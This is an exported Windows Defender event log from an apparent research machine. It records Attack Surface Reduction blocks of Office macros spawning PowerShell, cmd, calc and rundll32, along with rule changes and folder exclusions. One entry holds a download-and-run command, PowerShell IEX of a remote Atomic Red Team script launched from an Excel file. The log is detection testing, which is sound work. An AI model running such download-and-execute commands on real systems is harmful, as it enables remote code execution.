Detection time: 2023-11-17T17:18:05.565Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: powershell.exe
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:17:08 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2339
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:17:08.694Z
User: researchvmhaa\research
Path: C:\Windows\System32\calc.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\calc.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:16:52 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2338
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:16:52.179Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:44:11 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2319
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T16:44:11.592Z
User: researchvmhaa\research
Path: C:\Windows\System32\rundll32.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls"
Involved File: C:\Users\research\Desktop\macs\mac5.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:43:58 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2318
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
Detection time: 2023-11-17T16:43:58.799Z
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Target Commandline: "cmd"
Parent Commandline: C:\Windows\PSEXESVC.exe
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:43:58 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2317
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
Detection time: 2023-11-17T16:43:58.666Z
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Target Commandline: "cmd"
Parent Commandline: C:\Windows\PSEXESVC.exe
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:38:21 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2316
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\research\Desktop = 0x0
11/17/2023 04:37:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2311
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\research\Desktop\macs = 0x0
11/17/2023 04:35:02 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2297
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T16:35:02.260Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\mac1.xls"
Involved File: C:\Users\research\Desktop\mac1.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2291
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2290
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2289
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2288
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2287
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2286
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2285
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2284
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2283
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2282
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2281
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2280
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2279
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2278
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2277
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2276
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
11/17/2023 04:29:02 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2273
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 26190899-1602-49E8-8B27-EB1D0A1CE869
Detection time: 2023-11-17T16:29:02.666Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
Target Commandline: "C:\Windows\System32\cmd.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:27:34 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2272
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
Detection time: 2023-11-17T16:27:34.524Z
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Target Commandline: "cmd.exe"
Parent Commandline: C:\Windows\PSEXESVC.exe
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:05:15 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2083
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2
Detection time: 2023-11-17T16:05:15.532Z
User: NT AUTHORITY\SYSTEM
Path: C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
Process Name: C:\Windows\System32\lsass.exe
Target Commandline: "C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe"
Parent Commandline:
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 03:59:51 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2082
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T15:59:51.981Z
User: researchvmhaa\research
Path: C:\Windows\System32\calc.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\calc.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 03:59:16 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2081
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T15:59:16.861Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 09:28:52 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1903
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1867
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1866
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1865
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1864
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1863
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1862
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
